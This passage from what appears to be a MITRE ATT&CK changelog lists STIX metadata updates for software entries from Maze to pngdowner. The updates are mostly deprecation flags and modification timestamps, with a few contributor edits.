dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:07.387000+00:00 | 2025-04-25 14:43:19.128000+00:00

[S0449] Maze

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:37.773000+00:00 | 2025-04-25 14:44:49.604000+00:00

[S0459] MechaFlounder

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:38.886000+00:00 | 2025-04-25 14:44:52.837000+00:00

[S0179] MimiPenguin

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:52.183000+00:00 | 2025-04-25 14:45:19.566000+00:00

[S0051] MiniDuke

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:12.056000+00:00 | 2025-04-25 14:43:31.760000+00:00

[S0079] MobileOrder

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:04.825000+00:00 | 2025-04-25 14:43:09.588000+00:00

[S0553] MoleNet

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:21.182000+00:00 | 2025-04-25 14:43:57.040000+00:00

[S0149] MoonWind

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:27.217000+00:00 | 2025-04-25 14:44:13.834000+00:00

[S0590] NBTscan

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:55.369000+00:00 | 2025-04-25 14:45:26.872000+00:00

[S0272] NDiskMonitor

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:36.313000+00:00 | 2025-04-25 14:44:44.759000+00:00

[S0353] NOKKI

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:53.448000+00:00 | 2025-04-25 14:42:35.581000+00:00

[S0637] NativeZone

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:31.174000+00:00 | 2025-04-25 14:44:28.081000+00:00

[S0247] NavRAT

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:07.899000+00:00 | 2025-04-25 14:43:20.237000+00:00

[S0630] Nebulae

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:58.683000+00:00 | 2025-04-25 14:42:50.875000+00:00

[S0165] OSInfo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.861000+00:002025-04-25 14:45:06.283000+00:00

[S0644] ObliqueRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.744000+00:002025-04-25 14:43:25.456000+00:00

[S0346] OceanSalt

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:59.147000+00:002025-04-25 14:42:52.708000+00:00

[S0439] Okrum

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.946000+00:002025-04-25 14:43:14.113000+00:00

[S0365] Olympic Destroyer

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.435000+00:002025-04-25 14:42:59.783000+00:00

[S0052] OnionDuke

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.711000+00:002025-04-25 14:44:25.559000+00:00

[S0264] OopsIE

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.971000+00:002025-04-25 14:44:01.012000+00:00

[S0594] Out1

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:53.377000+00:002025-04-25 14:45:22.072000+00:00

[S0072] OwaAuth

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.901000+00:002025-04-25 14:44:19.163000+00:00

[S0598] P.A.S. Webshell

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.296000+00:002025-04-25 14:43:11.044000+00:00

[S0626] P8RAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:19.073000+00:002025-04-25 14:43:50.562000+00:00

[S0158] PHOREAL

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.708000+00:002025-04-25 14:45:05.924000+00:00

[S0254] PLAINTEE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.191000+00:002025-04-25 14:42:49.775000+00:00

[S0435] PLEAD

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.485000+00:002025-04-25 19:04:32.446000+00:00
x_mitre_contributors[1]Hannah Simes, BT SecurityHannah S

[S0150] POSHSPY

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:11.901000+00:002025-04-25 14:43:31.381000+00:00

[S0371] POWERTON

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:41.138000+00:002025-04-25 14:44:58.949000+00:00

[S0184] POWRUNER

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.652000+00:002025-04-25 14:42:38.309000+00:00

[S0122] Pass-The-Hash Toolkit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.785000+00:002025-04-25 14:45:25.272000+00:00

[S0556] Pay2Key

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.273000+00:002025-04-25 14:43:48.585000+00:00

[S0643] Peppy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.700000+00:002025-04-25 14:43:41.735000+00:00

[S0048] PinchDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.358000+00:002025-04-25 14:44:24.120000+00:00

[S0124] Pisloader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.474000+00:002025-04-25 14:44:31.662000+00:00

[S0453] Pony

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.346000+00:002025-04-25 14:42:50.153000+00:00

[S0177] Power Loader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.103000+00:002025-04-25 14:42:39.406000+00:00

[S0139] PowerDuke

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:51.754000+00:002025-04-25 14:42:30.325000+00:00

[S0441] PowerShower

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.537000+00:002025-04-25 14:43:19.493000+00:00

[S0393] PowerStallion

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.238000+00:002025-04-25 14:44:50.859000+00:00

[S0279] Proton

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.550000+00:002025-04-25 14:44:38.517000+00:00

[S0238] Proxysvc

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.139000+00:002025-04-25 14:42:34.849000+00:00

[S0078] Psylo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:39.039000+00:002025-04-25 14:44:53.196000+00:00

[S0583] Pysa

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.874000+00:002025-04-25 14:44:15.316000+00:00

[S0055] RARSTONE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.673000+00:002025-04-25 14:43:59.385000+00:00

[S0241] RATANKBA

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.215000+00:002025-04-25 14:44:11.826000+00:00

[S0495] RDAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.635000+00:002025-04-25 14:43:13.198000+00:00

[S0416] RDFSNIFFER

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.986000+00:002025-04-25 14:42:34.305000+00:00

[S0258] RGDoor

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.672000+00:002025-04-25 14:44:32.382000+00:00

[S0003] RIPTIDE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.044000+00:002025-04-25 14:44:22.846000+00:00

[S0112] ROCKBOOT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.715000+00:002025-04-25 14:44:42.600000+00:00

[S0240] ROKRAT

Current version: 2.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.531000+00:002025-04-25 14:43:33.037000+00:00

[S0458] Ramsay

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.837000+00:002025-04-25 14:44:32.751000+00:00

[S0169] RawPOS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.883000+00:002025-04-25 14:44:08.401000+00:00

[S0166] RemoteCMD

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:06.578000+00:002025-04-25 14:43:16.265000+00:00

[S0592] RemoteUtilities

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:49.636000+00:002025-04-25 14:45:11.980000+00:00

[S0400] RobbinHood

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.940000+00:002025-04-25 14:42:38.861000+00:00

[S0090] Rover

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.344000+00:002025-04-25 14:43:40.835000+00:00

[S0358] Ruler

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:53.872000+00:002025-04-25 14:45:22.953000+00:00

[S0253] RunningRAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.728000+00:002025-04-25 14:43:33.592000+00:00

[S0446] Ryuk

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.373000+00:002025-04-22 22:21:23.589000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report, @TheDFIRReport

[S0195] SDelete

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:56.799000+00:002025-04-25 14:45:30.257000+00:00

[S0185] SEASHARPEE

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.263000+00:002025-04-25 14:42:37.580000+00:00

[S0063] SHOTPUT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.918000+00:002025-04-25 14:43:25.821000+00:00

[S0692] SILENTTRINITY

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-09-23 14:18:53.140000+00:002025-04-30 13:26:45.728000+00:00
x_mitre_contributors[0]Daniel Acevedo, BlackbotDaniel Acevedo, ARMADO

[S0159] SNUGRIDE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.282000+00:002025-04-25 14:42:59.423000+00:00

[S0157] SOUNDBITE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.524000+00:002025-04-25 14:44:12.545000+00:00

[S0053] SeaDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.890000+00:002025-04-25 14:43:37.740000+00:00

[S0639] Seth-Locker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.630000+00:002025-04-25 14:45:07.890000+00:00

[S0546] SharpStage

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.445000+00:002025-04-25 14:42:40.376000+00:00

[S0444] ShimRat

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.372000+00:002025-04-25 14:43:24.555000+00:00

[S0445] ShimRatReporter

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:50.090000+00:002025-04-25 14:45:13.595000+00:00

[S0610] SideTwist

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.737000+00:002025-04-25 14:44:52.304000+00:00

[S0623] Siloscape

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.079000+00:002025-04-25 14:43:17.695000+00:00

[S0273] Socksbot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.498000+00:002025-04-25 14:44:56.967000+00:00

[S0627] SodaMaster

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.073000+00:002025-04-25 14:44:05.856000+00:00

[S0516] SoreFang

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.031000+00:002025-04-25 14:44:55.728000+00:00

[S0543] Spark

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.059000+00:002025-04-25 14:42:31.753000+00:00

[S0646] SpicyOmelette

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.394000+00:002025-04-25 14:43:27.242000+00:00

[S0058] SslMM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.128000+00:002025-04-25 14:42:57.989000+00:00

[S0188] Starloader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.530000+00:002025-04-25 14:44:07.496000+00:00

[S0142] StreamEx

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:22.967000+00:002025-04-25 14:44:02.994000+00:00

[S0018] Sykipot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.881000+00:002025-04-25 14:43:39.731000+00:00

[S0242] SynAck

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.360000+00:002025-04-25 14:42:32.305000+00:00

[S0060] Sys10

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.019000+00:002025-04-25 14:43:52.533000+00:00

[S0098] T9000

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.867000+00:002025-04-25 14:43:55.595000+00:00

[S0586] TAINTEDSCRIBE

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:19.869000+00:002025-04-25 14:43:52.174000+00:00

[S0164] TDTESS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.276000+00:002025-04-25 14:42:39.777000+00:00

[S0199] TURNEDUP

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.086000+00:002025-04-25 14:44:50.321000+00:00

[S0467] TajMahal

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.332000+00:002025-04-25 14:44:28.616000+00:00

[S0001] Trojan.Mebromi

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.746000+00:002025-04-25 14:44:38.888000+00:00

[S0178] Truvasys

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.507000+00:002025-04-25 14:43:39.011000+00:00

[S0647] Turian

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:02.104000+00:002025-04-25 14:43:01.037000+00:00

[S0116] UACMe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:49.934000+00:002025-04-25 14:45:13.232000+00:00

[S0275] UPPERCUT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.933000+00:002025-04-25 14:45:09.125000+00:00

[S0452] USBferry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.950000+00:002025-04-25 14:43:47.313000+00:00

[S0221] Umbreon

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:03.511000+00:002025-04-25 14:43:05.057000+00:00

[S0130] Unknown Logger

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.897000+00:002025-04-25 14:44:22.301000+00:00

[S0442] VBShower

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.823000+00:002025-04-25 14:43:59.751000+00:00

[S0636] VaporRage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.732000+00:002025-04-25 14:44:08.033000+00:00

[S0155] WINDSHIELD

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:25.359000+00:002025-04-25 14:44:09.479000+00:00

[S0515] WellMail

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.228000+00:002025-04-25 14:44:06.771000+00:00

[S0514] WellMess

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:02.903000+00:002025-04-25 14:43:03.067000+00:00

[S0059] WinMM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.498000+00:002025-04-25 14:42:50.511000+00:00

[S0176] Wingbird

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.211000+00:002025-04-25 14:44:20.703000+00:00

[S0041] Wiper

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.028000+00:002025-04-25 14:44:15.681000+00:00

[S0161] XAgentOSX

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.547000+00:002025-04-25 14:43:27.602000+00:00

[S0117] XTunnel

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.007000+00:002025-04-25 14:43:45.148000+00:00

[S0341] Xbash

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.191000+00:002025-04-25 14:43:40.462000+00:00

[S0251] Zebrocy

Current version: 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.500000+00:002025-04-25 14:44:17.288000+00:00

[S0027] Zeroaccess

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:08.895000+00:002025-04-25 14:43:22.946000+00:00

[S0202] adbupd

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:56.265000+00:002025-04-25 14:42:42.902000+00:00

[S0471] build_downer

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.962000+00:002025-04-25 14:44:46.558000+00:00

[S0472] down_new

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.345000+00:002025-04-25 14:43:58.304000+00:00

[S0071] hcdLoader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.900000+00:002025-04-25 14:44:13.298000+00:00

[S0068] httpclient

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.829000+00:002025-04-25 14:44:58.407000+00:00

[S0278] iKitten

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:00.655000+00:002025-04-25 14:42:56.342000+00:00

[S0101] ifconfig

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.252000+00:002025-04-25 14:45:17.053000+00:00

[S0175] meek

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:52.775000+00:002025-04-25 14:45:20.648000+00:00

[S0102] nbtstat

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:55.076000+00:002025-04-25 14:45:26.343000+00:00

[S0067] pngdowner

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
